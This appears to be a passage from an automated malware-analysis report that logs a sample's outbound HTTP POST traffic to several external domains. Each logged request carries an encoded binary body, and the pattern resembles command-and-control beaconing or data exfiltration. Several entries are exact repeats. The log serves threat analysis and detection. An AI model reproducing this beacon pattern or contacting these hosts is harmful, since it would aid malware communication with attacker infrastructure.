                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 4d 78 63 55 64 50 50 42 5a 69 6c 59 78 36 55 6d 70 4d 6a 6b 58 77 74 2f 69 53 35 51 6e 67 48 74 38 71 47 71 76 4f 4f 79 44 39 50 4f 6a 33 57 63 42 4c 58 6c 61 7a 6f 48 2b 65 56 77 56 6d 63 72 5a 62 53 69 46 4f 2b 44 75 78 37 56 4d 62 41 7a 4c 71 51 4b 57 50 70 38 4f 36 71 45 4a 7a 47 46 42 72 39 32 33 75 49 43 78 47 4b 64 71 44 36 2b 59 50 34 56 36 46 64 5a 33 56 43 56 56 78 34 70 57 7a 50 6c 35 6f 4c 58 7a 73 2b 57 37 6e 35 63 30 78 6f 31 48 46 32 4f 4f 75 59 61 54 39 49 4d 48 46 31 34 34 61 70 2f 4e 55 36 58 58 58 74 78 70 41 2f 71 51 77 32 74 36 4e 43 52 7a 66 6a 53 6c 70 78 72 32 51 6d 53 33 67 2b 78 47 79 6f 2f 58 47 51 48 6a 59 4c 49 38 30 53 6a 64 57 56 76 2f 55 5a 65 43 6c 65 50 68 58 4e 63 57 66 79 6f 50 44 54 35 39 6c 76 75 37 4c 52 55 49 74 58 54 74 6f 4d 48 74 77 50 6e 62 44 45 6b 53 55 77 76 76 56 49 75 47 62 6f 54 38 51 38 62 51 6e 49 4e 53 79 78 48 4e 34 62 66 7a 46 7a 53 70 4d 4a 46 42 46 5a 4b 61 54 52 34 56 58 38 6a 4e 59 2f 51 6e 70 79 35 71 6f 61 4d 4b 33 73 2b 72 2b 53 46 6e 6c 39 64 62 6f 55 53 36 6d 59 54 30 57 38 70 65 6a 61 72 45 71 31 30 32 2f 6b 47 62 73 71 59 31 74 59 6b 58 7a 39 5a 69 30 79 78 6b 66 44 43 6a 47 67 62 66 6c 42 76 64 37 65 54 72 73 61 50 5a 54 34 34 66 73 54 6d 41 4e 36 62 45 2b 6e 35 78 34 75 2f 78 6d 6c 78 37 37 34 70 74 57 78 66 44 47 79 45 61 35 76 68 77 57 4f 54 70 7a 70 34 7a 65 36 73 77 5a 2b 4b 61 4f 59 61 4b 78 49 4f 4b 77 66 6f 62 62 49 71 38 32 37 69 62 38 35 41 32 6b 64 49 46 69 6c 41 2f 43 38 2f 78 78 65 68 43 63 33 6f 52 57 55 4a 2b 32 30 6d 49 39 50 71 67 64 70 68 66 45 4d 55 61 64 47 54 4a 64 34 6a 4d 6b 59 6e 49 37 4a Data Ascii: GMxcUdPPBZilYx6UmpMjkXwt/iS5QngHt8qGqvOOyD9POj3WcBLXlazoH+eVwVmcrZbSiFO+Dux7VMbAzLqQKWPp8O6qEJzGFBr923uICxGKdqD6+YP4V6FdZ3VCVVx4pWzPl5oLXzs+W7n5c0xo1HF2OOuYaT9IMHF144ap/NU6XXXtxpA/qQw2t6NCRzfjSlpxr2QmS3g+xGyo/XGQHjYLI80SjdWVv/UZeClePhXNcWfyoPDT59lvu7LRUItXTtoMHtwPnbDEkSUwvvVIuGboT8Q8bQnINSyxHN4bfzFzSpMJFBFZKaTR4VX8jNY/Qnpy5qoaMK3s+r+SFnl9dboUS6mYT0W8pejarEq102/kGbsqY1tYkXz9Zi0yxkfDCjGgbflBvd7eTrsaPZT44fsTmAN6bE+n5x4u/xmlx774ptWxfDGyEa5vhwWOTpzp4ze6swZ+KaOYaKxIOKwfobbIq827ib85A2kdIFilA/C8/xxehCc3oRWUJ+20mI9PqgdphfEMUadGTJd4jMkYnI7J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 4d 78 63 55 64 50 50 42 5a 69 6c 59 78 36 55 6d 70 4d 6a 6b 58 77 74 2f 69 53 35 51 6e 67 48 74 38 71 47 71 76 4f 4f 79 44 39 50 4f 6a 33 57 63 42 4c 58 6c 61 7a 6f 48 2b 65 56 77 56 6d 63 72 5a 62 53 69 46 4f 2b 44 75 78 37 56 4d 62 41 7a 4c 71 51 4b 57 50 70 38 4f 36 71 45 4a 7a 47 46 42 72 39 32 33 75 49 43 78 47 4b 64 71 44 36 2b 59 50 34 56 36 46 64 5a 33 56 43 56 56 78 34 70 57 7a 50 6c 35 6f 4c 58 7a 73 2b 57 37 6e 35 63 30 78 6f 31 48 46 32 4f 4f 75 59 61 54 39 49 4d 48 46 31 34 34 61 70 2f 4e 55 36 58 58 58 74 78 70 41 2f 71 51 77 32 74 36 4e 43 52 7a 66 6a 53 6c 70 78 72 32 51 6d 53 33 67 2b 78 47 79 6f 2f 58 47 51 48 6a 59 4c 49 38 30 53 6a 64 57 56 76 2f 55 5a 65 43 6c 65 50 68 58 4e 63 57 66 79 6f 50 44 54 35 39 6c 76 75 37 4c 52 55 49 74 58 54 74 6f 4d 48 74 77 50 6e 62 44 45 6b 53 55 77 76 76 56 49 75 47 62 6f 54 38 51 38 62 51 6e 49 4e 53 79 78 48 4e 34 62 66 7a 46 7a 53 70 4d 4a 46 42 46 5a 4b 61 54 52 34 56 58 38 6a 4e 59 2f 51 6e 70 79 35 71 6f 61 4d 4b 33 73 2b 72 2b 53 46 6e 6c 39 64 62 6f 55 53 36 6d 59 54 30 57 38 70 65 6a 61 72 45 71 31 30 32 2f 6b 47 62 73 71 59 31 74 59 6b 58 7a 39 5a 69 30 79 78 6b 66 44 43 6a 47 67 62 66 6c 42 76 64 37 65 54 72 73 61 50 5a 54 34 34 66 73 54 6d 41 4e 36 62 45 2b 6e 35 78 34 75 2f 78 6d 6c 78 37 37 34 70 74 57 78 66 44 47 79 45 61 35 76 68 77 57 4f 54 70 7a 70 34 7a 65 36 73 77 5a 2b 4b 61 4f 59 61 4b 78 49 4f 4b 77 66 6f 62 62 49 71 38 32 37 69 62 38 35 41 32 6b 64 49 46 69 6c 41 2f 43 38 2f 78 78 65 68 43 63 33 6f 52 57 55 4a 2b 32 30 6d 49 39 50 71 67 64 70 68 66 45 4d 55 61 64 47 54 4a 64 34 6a 4d 6b 59 6e 49 37 4a Data Ascii: GMxcUdPPBZilYx6UmpMjkXwt/iS5QngHt8qGqvOOyD9POj3WcBLXlazoH+eVwVmcrZbSiFO+Dux7VMbAzLqQKWPp8O6qEJzGFBr923uICxGKdqD6+YP4V6FdZ3VCVVx4pWzPl5oLXzs+W7n5c0xo1HF2OOuYaT9IMHF144ap/NU6XXXtxpA/qQw2t6NCRzfjSlpxr2QmS3g+xGyo/XGQHjYLI80SjdWVv/UZeClePhXNcWfyoPDT59lvu7LRUItXTtoMHtwPnbDEkSUwvvVIuGboT8Q8bQnINSyxHN4bfzFzSpMJFBFZKaTR4VX8jNY/Qnpy5qoaMK3s+r+SFnl9dboUS6mYT0W8pejarEq102/kGbsqY1tYkXz9Zi0yxkfDCjGgbflBvd7eTrsaPZT44fsTmAN6bE+n5x4u/xmlx774ptWxfDGyEa5vhwWOTpzp4ze6swZ+KaOYaKxIOKwfobbIq827ib85A2kdIFilA/C8/xxehCc3oRWUJ+20mI9PqgdphfEMUadGTJd4jMkYnI7J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 4d 78 63 55 64 50 50 42 5a 69 6c 59 78 36 55 6d 70 4d 6a 6b 58 77 74 2f 69 53 35 51 6e 67 48 74 38 71 47 71 76 4f 4f 79 44 39 50 4f 6a 33 57 63 42 4c 58 6c 61 7a 6f 48 2b 65 56 77 56 6d 63 72 5a 62 53 69 46 4f 2b 44 75 78 37 56 4d 62 41 7a 4c 71 51 4b 57 50 70 38 4f 36 71 45 4a 7a 47 46 42 72 39 32 33 75 49 43 78 47 4b 64 71 44 36 2b 59 50 34 56 36 46 64 5a 33 56 43 56 56 78 34 70 57 7a 50 6c 35 6f 4c 58 7a 73 2b 57 37 6e 35 63 30 78 6f 31 48 46 32 4f 4f 75 59 61 54 39 49 4d 48 46 31 34 34 61 70 2f 4e 55 36 58 58 58 74 78 70 41 2f 71 51 77 32 74 36 4e 43 52 7a 66 6a 53 6c 70 78 72 32 51 6d 53 33 67 2b 78 47 79 6f 2f 58 47 51 48 6a 59 4c 49 38 30 53 6a 64 57 56 76 2f 55 5a 65 43 6c 65 50 68 58 4e 63 57 66 79 6f 50 44 54 35 39 6c 76 75 37 4c 52 55 49 74 58 54 74 6f 4d 48 74 77 50 6e 62 44 45 6b 53 55 77 76 76 56 49 75 47 62 6f 54 38 51 38 62 51 6e 49 4e 53 79 78 48 4e 34 62 66 7a 46 7a 53 70 4d 4a 46 42 46 5a 4b 61 54 52 34 56 58 38 6a 4e 59 2f 51 6e 70 79 35 71 6f 61 4d 4b 33 73 2b 72 2b 53 46 6e 6c 39 64 62 6f 55 53 36 6d 59 54 30 57 38 70 65 6a 61 72 45 71 31 30 32 2f 6b 47 62 73 71 59 31 74 59 6b 58 7a 39 5a 69 30 79 78 6b 66 44 43 6a 47 67 62 66 6c 42 76 64 37 65 54 72 73 61 50 5a 54 34 34 66 73 54 6d 41 4e 36 62 45 2b 6e 35 78 34 75 2f 78 6d 6c 78 37 37 34 70 74 57 78 66 44 47 79 45 61 35 76 68 77 57 4f 54 70 7a 70 34 7a 65 36 73 77 5a 2b 4b 61 4f 59 61 4b 78 49 4f 4b 77 66 6f 62 62 49 71 38 32 37 69 62 38 35 41 32 6b 64 49 46 69 6c 41 2f 43 38 2f 78 78 65 68 43 63 33 6f 52 57 55 4a 2b 32 30 6d 49 39 50 71 67 64 70 68 66 45 4d 55 61 64 47 54 4a 64 34 6a 4d 6b 59 6e 49 37 4a Data Ascii: GMxcUdPPBZilYx6UmpMjkXwt/iS5QngHt8qGqvOOyD9POj3WcBLXlazoH+eVwVmcrZbSiFO+Dux7VMbAzLqQKWPp8O6qEJzGFBr923uICxGKdqD6+YP4V6FdZ3VCVVx4pWzPl5oLXzs+W7n5c0xo1HF2OOuYaT9IMHF144ap/NU6XXXtxpA/qQw2t6NCRzfjSlpxr2QmS3g+xGyo/XGQHjYLI80SjdWVv/UZeClePhXNcWfyoPDT59lvu7LRUItXTtoMHtwPnbDEkSUwvvVIuGboT8Q8bQnINSyxHN4bfzFzSpMJFBFZKaTR4VX8jNY/Qnpy5qoaMK3s+r+SFnl9dboUS6mYT0W8pejarEq102/kGbsqY1tYkXz9Zi0yxkfDCjGgbflBvd7eTrsaPZT44fsTmAN6bE+n5x4u/xmlx774ptWxfDGyEa5vhwWOTpzp4ze6swZ+KaOYaKxIOKwfobbIq827ib85A2kdIFilA/C8/xxehCc3oRWUJ+20mI9PqgdphfEMUadGTJd4jMkYnI7J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 4d 78 63 55 64 50 50 42 5a 69 6c 59 78 36 55 6d 70 4d 6a 6b 58 77 74 2f 69 53 35 51 6e 67 48 74 38 71 47 71 76 4f 4f 79 44 39 50 4f 6a 33 57 63 42 4c 58 6c 61 7a 6f 48 2b 65 56 77 56 6d 63 72 5a 62 53 69 46 4f 2b 44 75 78 37 56 4d 62 41 7a 4c 71 51 4b 57 50 70 38 4f 36 71 45 4a 7a 47 46 42 72 39 32 33 75 49 43 78 47 4b 64 71 44 36 2b 59 50 34 56 36 46 64 5a 33 56 43 56 56 78 34 70 57 7a 50 6c 35 6f 4c 58 7a 73 2b 57 37 6e 35 63 30 78 6f 31 48 46 32 4f 4f 75 59 61 54 39 49 4d 48 46 31 34 34 61 70 2f 4e 55 36 58 58 58 74 78 70 41 2f 71 51 77 32 74 36 4e 43 52 7a 66 6a 53 6c 70 78 72 32 51 6d 53 33 67 2b 78 47 79 6f 2f 58 47 51 48 6a 59 4c 49 38 30 53 6a 64 57 56 76 2f 55 5a 65 43 6c 65 50 68 58 4e 63 57 66 79 6f 50 44 54 35 39 6c 76 75 37 4c 52 55 49 74 58 54 74 6f 4d 48 74 77 50 6e 62 44 45 6b 53 55 77 76 76 56 49 75 47 62 6f 54 38 51 38 62 51 6e 49 4e 53 79 78 48 4e 34 62 66 7a 46 7a 53 70 4d 4a 46 42 46 5a 4b 61 54 52 34 56 58 38 6a 4e 59 2f 51 6e 70 79 35 71 6f 61 4d 4b 33 73 2b 72 2b 53 46 6e 6c 39 64 62 6f 55 53 36 6d 59 54 30 57 38 70 65 6a 61 72 45 71 31 30 32 2f 6b 47 62 73 71 59 31 74 59 6b 58 7a 39 5a 69 30 79 78 6b 66 44 43 6a 47 67 62 66 6c 42 76 64 37 65 54 72 73 61 50 5a 54 34 34 66 73 54 6d 41 4e 36 62 45 2b 6e 35 78 34 75 2f 78 6d 6c 78 37 37 34 70 74 57 78 66 44 47 79 45 61 35 76 68 77 57 4f 54 70 7a 70 34 7a 65 36 73 77 5a 2b 4b 61 4f 59 61 4b 78 49 4f 4b 77 66 6f 62 62 49 71 38 32 37 69 62 38 35 41 32 6b 64 49 46 69 6c 41 2f 43 38 2f 78 78 65 68 43 63 33 6f 52 57 55 4a 2b 32 30 6d 49 39 50 71 67 64 70 68 66 45 4d 55 61 64 47 54 4a 64 34 6a 4d 6b 59 6e 49 37 4a Data Ascii: GMxcUdPPBZilYx6UmpMjkXwt/iS5QngHt8qGqvOOyD9POj3WcBLXlazoH+eVwVmcrZbSiFO+Dux7VMbAzLqQKWPp8O6qEJzGFBr923uICxGKdqD6+YP4V6FdZ3VCVVx4pWzPl5oLXzs+W7n5c0xo1HF2OOuYaT9IMHF144ap/NU6XXXtxpA/qQw2t6NCRzfjSlpxr2QmS3g+xGyo/XGQHjYLI80SjdWVv/UZeClePhXNcWfyoPDT59lvu7LRUItXTtoMHtwPnbDEkSUwvvVIuGboT8Q8bQnINSyxHN4bfzFzSpMJFBFZKaTR4VX8jNY/Qnpy5qoaMK3s+r+SFnl9dboUS6mYT0W8pejarEq102/kGbsqY1tYkXz9Zi0yxkfDCjGgbflBvd7eTrsaPZT44fsTmAN6bE+n5x4u/xmlx774ptWxfDGyEa5vhwWOTpzp4ze6swZ+KaOYaKxIOKwfobbIq827ib85A2kdIFilA/C8/xxehCc3oRWUJ+20mI9PqgdphfEMUadGTJd4jMkYnI7J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 57 52 49 76 77 59 33 76 78 70 65 72 55 2b 6c 54 42 45 76 41 6d 55 62 37 6b 67 6e 37 6a 53 61 67 45 5a 6c 30 55 36 51 51 4c 4a 36 72 47 70 70 43 4f 7a 5a 6d 68 6f 42 69 4b 56 2b 5a 64 54 76 49 6c 42 78 2b 4c 73 4b 79 33 6c 35 65 52 7a 62 6d 6f 52 4d 78 52 6b 49 6e 2f 63 31 35 50 56 64 38 33 6a 2b 45 31 41 36 37 71 5a 49 37 73 6a 54 55 4b 66 67 43 74 6f 42 58 61 4e 42 58 45 59 34 4c 2f 6c 78 62 6d 41 51 54 4a 49 56 48 2f 6a 75 70 4c 6c 64 31 70 73 64 6e 59 73 77 73 70 46 6c 47 35 79 45 55 75 6e 67 6d 6d 62 56 6c 73 4c 64 30 7a 6d 77 77 43 35 69 61 46 55 4f 73 5a 43 30 53 50 72 73 4e 4e 77 52 4e 32 64 38 43 66 51 48 30 7a 54 47 4c 6a 31 55 4f 57 42 72 38 74 68 70 79 52 78 78 35 74 32 70 49 33 54 2b 44 57 67 6c 2f 79 34 6b 55 77 54 6a 34 6f 6d 2f 6a 6b 38 73 66 42 6a 36 56 36 51 32 68 67 47 36 58 6c 53 30 33 59 61 4d 34 6c 44 75 62 48 34 70 51 45 59 68 32 65 65 32 45 4b 48 6d 55 6d 65 57 48 4e 57 46 6b 57 50 61 55 35 39 33 57 41 61 67 42 56 39 4d 41 75 2f 33 59 49 37 73 35 5a 32 72 4e 33 61 4f 57 44 66 58 78 54 50 36 57 30 56 64 51 72 45 51 69 69 57 6d 5a 53 50 34 4f 46 48 2b 67 54 2b 54 64 41 43 6f 52 48 61 6e 32 71 65 47 4d 64 52 58 5a 64 45 63 5a 35 59 36 73 58 65 36 57 34 4f 4d 77 39 49 50 79 50 61 32 54 64 64 6a 42 66 51 76 34 75 2b 65 55 76 70 43 4b 47 4e 50 72 73 65 48 78 4f 51 58 2f 39 61 55 32 4e 33 36 6c 67 69 4d 76 41 31 32 6c 31 6d 7a 73 45 68 53 33 72 44 65 64 6e 55 67 55 53 35 54 56 4e 4e 7a 34 33 43 77 6b 35 4c 35 45 54 53 6a 38 46 63 48 31 57 41 74 67 6b 45 76 7a 71 44 35 73 41 75 6b 61 33 37 4d 4a 57 58 68 76 75 48 37 41 52 71 76 58 4e 69 56 65 49 67 3d 3d Data Ascii: WRIvwY3vxperU+lTBEvAmUb7kgn7jSagEZl0U6QQLJ6rGppCOzZmhoBiKV+ZdTvIlBx+LsKy3l5eRzbmoRMxRkIn/c15PVd83j+E1A67qZI7sjTUKfgCtoBXaNBXEY4L/lxbmAQTJIVH/jupLld1psdnYswspFlG5yEUungmmbVlsLd0zmwwC5iaFUOsZC0SPrsNNwRN2d8CfQH0zTGLj1UOWBr8thpyRxx5t2pI3T+DWgl/y4kUwTj4om/jk8sfBj6V6Q2hgG6XlS03YaM4lDubH4pQEYh2ee2EKHmUmeWHNWFkWPaU593WAagBV9MAu/3YI7s5Z2rN3aOWDfXxTP6W0VdQrEQiiWmZSP4OFH+gT+TdACoRHan2qeGMdRXZdEcZ5Y6sXe6W4OMw9IPyPa2TddjBfQv4u+eUvpCKGNPrseHxOQX/9aU2N36lgiMvA12l1mzsEhS3rDednUgUS5TVNNz43Cwk5L5ETSj8FcH1WAtgkEvzqD5sAuka37MJWXhvuH7ARqvXNiVeIg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 70 4e 4a 4b 35 72 78 56 41 70 67 50 6f 44 61 2b 5a 7a 55 53 51 6b 39 51 79 68 78 55 58 52 35 5a 73 43 4b 45 41 62 59 6f 77 4b 5a 35 67 53 36 46 6b 72 6d 63 36 67 67 70 2b 67 4e 6e 66 6f 4f 42 34 6d 57 2f 4d 37 52 55 43 67 6c 52 6f 4b 74 66 42 31 6f 69 4c 74 62 58 79 78 58 30 37 41 45 57 79 65 2b 51 45 75 68 33 32 4d 78 42 4e 54 2f 32 33 57 6b 46 59 70 53 69 64 36 6b 53 35 76 39 73 33 42 42 4a 6b 2f 67 4f 36 73 4b 6d 45 65 5a 69 48 71 41 37 66 4a 4a 63 64 35 71 75 2b 75 6c 48 71 46 79 6f 6f 49 6a 47 6a 2b 43 61 30 61 68 54 73 5a 32 2f 5a 41 73 2f 79 4a 41 66 41 38 68 50 71 4c 59 36 48 44 70 54 73 75 37 44 4e 66 4a 44 73 4f 6c 6b 52 44 66 55 50 31 79 54 74 65 31 4d 47 44 56 6b 72 41 49 4e 53 4a 33 59 37 61 72 59 61 7a 6b 74 4b 67 56 70 30 48 66 33 75 70 54 37 34 42 33 77 79 45 78 4d 50 61 41 6b 7a 75 4a 64 35 4d 4c 41 6b 5a 48 49 31 59 77 61 75 58 6f 75 36 46 2f 56 66 6c 59 73 2b 56 65 45 79 73 2b 46 78 59 4f 68 4c 51 78 52 61 51 34 41 5a 6e 62 65 50 53 56 68 57 50 62 45 6a 5a 6d 57 37 6f 53 6c 43 2f 4f 39 70 7a 46 6c 4a 46 65 52 55 6c 77 50 38 53 4f 54 73 56 39 75 49 58 66 58 75 62 4c 2f 30 70 69 4c 41 51 47 48 35 73 63 50 2f 6c 66 47 75 47 49 6f 49 67 6b 36 53 45 43 77 5a 35 53 50 50 76 6c 45 72 4f 71 42 61 66 62 53 74 39 46 35 64 71 50 55 79 70 64 36 79 34 68 39 76 39 62 37 66 33 45 45 33 58 74 6e 74 36 42 6b 49 46 56 64 52 6a 48 53 64 4e 54 64 57 55 5a 63 79 6b 52 4e 34 4e 35 39 4a 6e 57 79 57 4f 66 65 31 73 48 41 6c 6f 72 54 54 32 46 68 6b 34 42 77 64 49 56 78 76 39 57 48 57 41 59 78 43 44 7a 6d 47 6c 37 4f 45 43 2f 70 48 4a 6a 51 34 4b 45 43 43 43 42 43 32 51 44 70 66 73 66 70 Data Ascii: pNJK5rxVApgPoDa+ZzUSQk9QyhxUXR5ZsCKEAbYowKZ5gS6Fkrmc6ggp+gNnfoOB4mW/M7RUCglRoKtfB1oiLtbXyxX07AEWye+QEuh32MxBNT/23WkFYpSid6kS5v9s3BBJk/gO6sKmEeZiHqA7fJJcd5qu+ulHqFyooIjGj+Ca0ahTsZ2/ZAs/yJAfA8hPqLY6HDpTsu7DNfJDsOlkRDfUP1yTte1MGDVkrAINSJ3Y7arYazktKgVp0Hf3upT74B3wyExMPaAkzuJd5MLAkZHI1YwauXou6F/VflYs+VeEys+FxYOhLQxRaQ4AZnbePSVhWPbEjZmW7oSlC/O9pzFlJFeRUlwP8SOTsV9uIXfXubL/0piLAQGH5scP/lfGuGIoIgk6SECwZ5SPPvlErOqBafbSt9F5dqPUypd6y4h9v9b7f3EE3Xtnt6BkIFVdRjHSdNTdWUZcykRN4N59JnWyWOfe1sHAlorTT2Fhk4BwdIVxv9WHWAYxCDzmGl7OEC/pHJjQ4KECCCBC2QDpfsfp
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 70 4e 4a 4b 35 72 78 56 41 70 67 50 6f 44 61 2b 5a 7a 55 53 51 6b 39 51 79 68 78 55 58 52 35 5a 73 43 4b 45 41 62 59 6f 77 4b 5a 35 67 53 36 46 6b 72 6d 63 36 67 67 70 2b 67 4e 6e 66 6f 4f 42 34 6d 57 2f 4d 37 52 55 43 67 6c 52 6f 4b 74 66 42 31 6f 69 4c 74 62 58 79 78 58 30 37 41 45 57 79 65 2b 51 45 75 68 33 32 4d 78 42 4e 54 2f 32 33 57 6b 46 59 70 53 69 64 36 6b 53 35 76 39 73 33 42 42 4a 6b 2f 67 4f 36 73 4b 6d 45 65 5a 69 48 71 41 37 66 4a 4a 63 64 35 71 75 2b 75 6c 48 71 46 79 6f 6f 49 6a 47 6a 2b 43 61 30 61 68 54 73 5a 32 2f 5a 41 73 2f 79 4a 41 66 41 38 68 50 71 4c 59 36 48 44 70 54 73 75 37 44 4e 66 4a 44 73 4f 6c 6b 52 44 66 55 50 31 79 54 74 65 31 4d 47 44 56 6b 72 41 49 4e 53 4a 33 59 37 61 72 59 61 7a 6b 74 4b 67 56 70 30 48 66 33 75 70 54 37 34 42 33 77 79 45 78 4d 50 61 41 6b 7a 75 4a 64 35 4d 4c 41 6b 5a 48 49 31 59 77 61 75 58 6f 75 36 46 2f 56 66 6c 59 73 2b 56 65 45 79 73 2b 46 78 59 4f 68 4c 51 78 52 61 51 34 41 5a 6e 62 65 50 53 56 68 57 50 62 45 6a 5a 6d 57 37 6f 53 6c 43 2f 4f 39 70 7a 46 6c 4a 46 65 52 55 6c 77 50 38 53 4f 54 73 56 39 75 49 58 66 58 75 62 4c 2f 30 70 69 4c 41 51 47 48 35 73 63 50 2f 6c 66 47 75 47 49 6f 49 67 6b 36 53 45 43 77 5a 35 53 50 50 76 6c 45 72 4f 71 42 61 66 62 53 74 39 46 35 64 71 50 55 79 70 64 36 79 34 68 39 76 39 62 37 66 33 45 45 33 58 74 6e 74 36 42 6b 49 46 56 64 52 6a 48 53 64 4e 54 64 57 55 5a 63 79 6b 52 4e 34 4e 35 39 4a 6e 57 79 57 4f 66 65 31 73 48 41 6c 6f 72 54 54 32 46 68 6b 34 42 77 64 49 56 78 76 39 57 48 57 41 59 78 43 44 7a 6d 47 6c 37 4f 45 43 2f 70 48 4a 6a 51 34 4b 45 43 43 43 42 43 32 51 44 70 66 73 66 70 Data Ascii: pNJK5rxVApgPoDa+ZzUSQk9QyhxUXR5ZsCKEAbYowKZ5gS6Fkrmc6ggp+gNnfoOB4mW/M7RUCglRoKtfB1oiLtbXyxX07AEWye+QEuh32MxBNT/23WkFYpSid6kS5v9s3BBJk/gO6sKmEeZiHqA7fJJcd5qu+ulHqFyooIjGj+Ca0ahTsZ2/ZAs/yJAfA8hPqLY6HDpTsu7DNfJDsOlkRDfUP1yTte1MGDVkrAINSJ3Y7arYazktKgVp0Hf3upT74B3wyExMPaAkzuJd5MLAkZHI1YwauXou6F/VflYs+VeEys+FxYOhLQxRaQ4AZnbePSVhWPbEjZmW7oSlC/O9pzFlJFeRUlwP8SOTsV9uIXfXubL/0piLAQGH5scP/lfGuGIoIgk6SECwZ5SPPvlErOqBafbSt9F5dqPUypd6y4h9v9b7f3EE3Xtnt6BkIFVdRjHSdNTdWUZcykRN4N59JnWyWOfe1sHAlorTT2Fhk4BwdIVxv9WHWAYxCDzmGl7OEC/pHJjQ4KECCCBC2QDpfsfp
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 39 4e 38 2f 59 52 6e 6c 4c 35 6a 49 37 6d 57 64 4b 49 75 57 61 37 4a 67 75 31 46 33 49 4d 47 76 58 51 47 6b 50 34 67 6e 65 61 64 6d 74 37 33 37 6a 6b 6d 75 33 55 6c 73 4e 4a 43 66 4d 56 44 56 71 45 44 4d 33 6e 75 55 4a 38 56 6f 66 72 54 56 78 43 66 46 5a 35 2f 4d 6f 6d 34 30 43 2b 46 37 30 33 51 53 4f 70 7a 59 4c 54 56 32 58 54 34 57 4d 63 6f 6c 49 52 41 73 35 4d 65 68 4d 74 34 55 70 69 2b 54 79 35 2f 6f 35 68 77 6a 37 6b 6f 4c 4b 6b 34 4f 31 76 62 47 75 66 48 6e 48 75 65 4c 47 65 4f 2b 71 61 52 62 6c 6a 46 65 42 4d 33 4c 66 76 30 77 54 38 38 46 6f 33 37 30 61 77 39 38 64 49 78 47 44 71 69 72 62 6a 59 75 57 64 6a 66 58 50 6b 48 6b 7a 36 4b 59 75 5a 5a 74 5a 53 4b 67 72 52 5a 58 75 6f 6f 56 63 38 50 44 6a 56 6e 70 33 4a 51 48 74 47 65 44 4f 42 62 6e 39 4f 31 59 39 34 32 41 4c 45 42 79 50 7a 31 4b 4b 66 4a 39 43 62 61 70 46 47 44 68 45 68 4b 6a 39 45 46 4e 63 50 37 53 71 76 43 32 70 39 76 61 2f 79 58 68 76 6a 6f 6c 2b 70 66 58 46 49 4e 35 59 71 34 76 59 77 43 50 55 30 59 61 6c 44 77 52 47 71 30 66 41 4a 4d 44 49 58 72 4e 41 78 57 55 52 45 6e 38 4b 46 6a 35 78 41 48 4f 39 38 36 4b 58 4a 6c 4c 65 2f 42 39 71 62 66 56 6d 32 73 53 59 57 4b 59 48 39 51 6f 78 4d 63 70 68 33 37 61 41 49 64 78 39 43 79 79 2f 70 79 76 38 6f 79 76 47 48 6b 6b 33 31 76 6d 69 2f 41 46 55 49 73 71 71 2f 71 78 63 2f 42 33 79 58 59 71 52 75 6c 57 42 66 54 73 49 65 6f 42 41 72 39 73 31 53 72 67 70 78 6e 57 68 4e 33 44 30 57 6f 4f 56 36 2f 30 72 42 45 52 59 2b 67 64 63 6a 75 55 2f 35 4a 6c 44 63 41 66 6c 67 72 2f 49 68 31 4d 48 63 54 41 33 44 73 4f 58 30 30 30 39 30 37 53 4b 6c 6c 65 57 78 43 41 63 4e 47 48 72 6d 31 76 6a 52 78 63 37 76 33 6d 35 6c 43 78 62 32 59 69 35 77 31 35 67 3d 3d Data Ascii: 9N8/YRnlL5jI7mWdKIuWa7Jgu1F3IMGvXQGkP4gneadmt737jkmu3UlsNJCfMVDVqEDM3nuUJ8VofrTVxCfFZ5/Mom40C+F703QSOpzYLTV2XT4WMcolIRAs5MehMt4Upi+Ty5/o5hwj7koLKk4O1vbGufHnHueLGeO+qaRbljFeBM3Lfv0wT88Fo370aw98dIxGDqirbjYuWdjfXPkHkz6KYuZZtZSKgrRZXuooVc8PDjVnp3JQHtGeDOBbn9O1Y942ALEByPz1KKfJ9CbapFGDhEhKj9EFNcP7SqvC2p9va/yXhvjol+pfXFIN5Yq4vYwCPU0YalDwRGq0fAJMDIXrNAxWUREn8KFj5xAHO986KXJlLe/B9qbfVm2sSYWKYH9QoxMcph37aAIdx9Cyy/pyv8oyvGHkk31vmi/AFUIsqq/qxc/B3yXYqRulWBfTsIeoBAr9s1SrgpxnWhN3D0WoOV6/0rBERY+gdcjuU/5JlDcAflgr/Ih1MHcTA3DsOX000907SKlleWxCAcNGHrm1vjRxc7v3m5lCxb2Yi5w15g==
